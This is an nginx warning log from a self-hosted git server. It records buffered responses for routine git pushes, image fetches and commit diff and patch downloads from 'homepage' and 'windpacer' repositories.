2026/02/15 19:19:10 [warn] 841#841: *25348 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/51/0000005519 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/16 12:05:06 [warn] 876#876: *35963 a client request body is buffered to a temporary file /tmp/nginx/body/3/11/0000010113, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "POST /windpacer/homepage.git/git-receive-pack HTTP/2.0", host: "git.hanmocnn.co.kr"
2026/02/16 12:05:38 [warn] 877#877: *35968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/11/0000010114 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr"
2026/02/16 12:05:38 [warn] 877#877: *35968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/11/0000010115 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr"
2026/02/16 12:05:38 [warn] 877#877: *35968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/11/0000010116 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr"
2026/02/16 12:05:38 [warn] 877#877: *35968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/11/0000010117 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr"
2026/02/17 02:36:39 [warn] 900#900: *40411 a client request body is buffered to a temporary file /tmp/nginx/body/9/01/0000011019, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "POST /windpacer/homepage.git/git-receive-pack HTTP/2.0", host: "git.hanmocnn.co.kr"
2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/02/0000011020 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr"
2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/02/0000011021 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr"
2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/02/0000011022 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png", host: "git.hanmocnn.co.kr"
2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/02/0000011023 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr"
2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/02/0000011024 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png", host: "git.hanmocnn.co.kr"
2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/02/0000011025 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png", host: "git.hanmocnn.co.kr"
2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/02/0000011026 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr"
2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/02/0000011027 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr"
2026/02/17 12:59:23 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/03/0000014038 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js.4cf15d9a.map HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js.4cf15d9a.map", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/assets/js/index.js?v=1.25.3"
2026/02/17 13:00:53 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/03/0000014039 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a"
2026/02/17 13:01:04 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/04/0000014040 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a"
2026/02/17 13:04:02 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/04/0000014041 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png"
2026/02/17 13:04:10 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/04/0000014042 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png"
2026/02/17 13:04:17 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/04/0000014043 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html"
2026/02/17 13:04:29 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/04/0000014044 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png"
2026/02/17 13:04:59 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/04/0000014045 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png"
2026/02/17 13:07:30 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/04/0000014046 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png"
2026/02/17 13:08:45 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/04/0000014047 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png"
2026/02/17 13:08:53 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/04/0000014048 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6"
2026/02/17 13:09:18 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/04/0000014049 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1"
2026/02/17 13:09:43 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/05/0000014050 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg"
2026/02/17 13:09:58 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/05/0000014051 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg"
2026/02/17 13:10:04 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/05/0000014052 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe"
2026/02/17 13:10:13 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/05/0000014053 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.diff", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1"
2026/02/17 13:11:04 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/05/0000014054 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c"
2026/02/17 13:12:09 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/05/0000014055 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe"
2026/02/17 13:13:08 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/05/0000014056 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg"
2026/02/17 13:13:21 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/05/0000014057 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe"
2026/02/17 13:15:13 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/05/0000014058 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.diff", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e"
2026/02/17 13:15:34 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/05/0000014059 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg"
2026/02/17 13:15:53 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/06/0000014060 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c"
2026/02/17 13:18:09 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/06/0000014061 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.diff", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d"
2026/02/17 13:20:49 [warn] 917#917: *49234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/06/0000014062 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0"
2026/02/17 13:22:49 [warn] 917#917: *49234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/06/0000014063 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d"
2026/02/17 13:24:28 [warn] 917#917: *49234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/06/0000014064 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e"
2026/02/17 13:25:18 [warn] 917#917: *49234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/06/0000014065 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6"
2026/02/17 13:34:01 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/06/0000014066 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-all", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-change"
2026/02/17 13:36:02 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/06/0000014067 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png"
2026/02/17 13:38:43 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/07/0000014071 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html"
2026/02/17 13:39:22 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/07/0000014072 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png"
2026/02/17 13:39:28 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/07/0000014073 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png"
2026/02/17 13:39:34 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/07/0000014074 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png"
